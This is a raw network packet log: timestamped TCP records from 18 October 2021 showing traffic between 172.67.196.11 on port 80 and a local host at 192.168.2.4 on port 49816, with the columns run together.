                                                                    Oct 18, 2021 08:02:35.365591049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365606070 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.365629911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365670919 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365695000 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.365710974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365751982 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365783930 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365802050 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.365825891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365864992 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365896940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365942955 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.365986109 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366024017 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366061926 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366065025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366105080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366115093 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366146088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366183996 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366187096 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366226912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366244078 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366271973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366312981 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366353035 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366369009 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366394043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366400003 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366450071 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366487980 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366513014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366527081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366569996 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366609097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366616011 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366648912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366662025 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366688013 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366734982 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366739988 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366774082 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366780043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366820097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366832972 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366861105 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366900921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366914988 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.366939068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.366980076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367002964 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367021084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367068052 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367113113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367147923 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367186069 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367225885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367232084 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367266893 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367275953 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367307901 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367347002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367388964 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367409945 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367429972 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367434978 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367475033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367517948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367527962 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367557049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367607117 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367630005 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367645979 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367654085 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367671013 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367676973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367701054 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367727041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367743015 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367747068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367768049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367772102 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367790937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367805004 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367814064 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367836952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367856026 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367866993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367893934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367919922 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367935896 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367944002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367966890 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.367968082 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.367991924 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368006945 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368014097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368036985 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368057966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368062973 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368083000 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368097067 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368107080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368133068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368155003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368175983 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368177891 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368197918 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368221045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368221045 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368242025 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368243933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368268013 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368294954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368314981 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368319035 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368343115 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368357897 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368365049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368388891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368406057 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368412018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368427992 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368434906 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368458986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368484974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368488073 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368510008 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368531942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368551016 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368555069 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368576050 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368577957 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368601084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368623972 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368623972 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368648052 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368669987 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368684053 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368715048 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368736029 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368740082 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368765116 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368778944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368787050 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368810892 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368833065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368870974 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368884087 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368908882 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.368911028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368935108 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368957043 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.368978024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369018078 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369051933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369102001 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369123936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369144917 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369168997 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369169950 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369200945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369206905 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369213104 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369223118 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369235992 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369251013 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369255066 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369262934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369271994 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369276047 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369297981 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369299889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369321108 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.369340897 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.369379997 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.370018005 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370044947 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370064020 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370083094 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370100975 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370121002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370143890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370170116 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370172024 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.370193958 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370196104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.370213032 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.370217085 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370239973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.370254040 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372014999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372076988 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372082949 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372102022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372126102 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372143030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372147083 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372169018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372190952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372215033 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372216940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372241020 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372241974 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372263908 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372287035 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372287989 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372308969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372330904 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372354031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372359037 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372376919 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372381926 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372405052 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372423887 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.372428894 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.372473955 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373521090 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373545885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373564959 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373580933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373598099 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373616934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373634100 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373653889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373663902 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373689890 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373703003 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373711109 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373717070 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373739004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373761892 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373781919 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373800993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373802900 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373819113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373837948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373842955 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373853922 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373871088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373887062 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373893023 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.373907089 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.373950005 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.384893894 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.384922981 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.384943962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.384963989 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.384984016 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385008097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385030031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385046005 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385049105 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385066032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385077953 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385097027 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385099888 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385113001 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385128021 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385150909 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385171890 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385298967 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385317087 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385334969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385349035 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385379076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385396004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385411024 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385422945 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385425091 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385437965 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385457039 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385458946 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385478020 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385482073 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385492086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385499001 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385508060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385541916 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385556936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385575056 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385588884 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385610104 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385621071 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385627031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385646105 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.385646105 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.385704994 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.386290073 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386313915 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386331081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386343956 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.386349916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386369944 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386380911 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.386392117 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386414051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386432886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386441946 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.386451960 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386471987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386490107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386509895 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386528969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386553049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386574030 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386594057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386604071 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.386614084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386635065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.386642933 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.386670113 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.387237072 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.387299061 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.387306929 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.387517929 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.387547970 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.387650967 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.388818979 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.388844013 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.388864994 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.388885021 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.388885021 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.388905048 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.388923883 CEST8049816172.67.196.11192.168.2.4
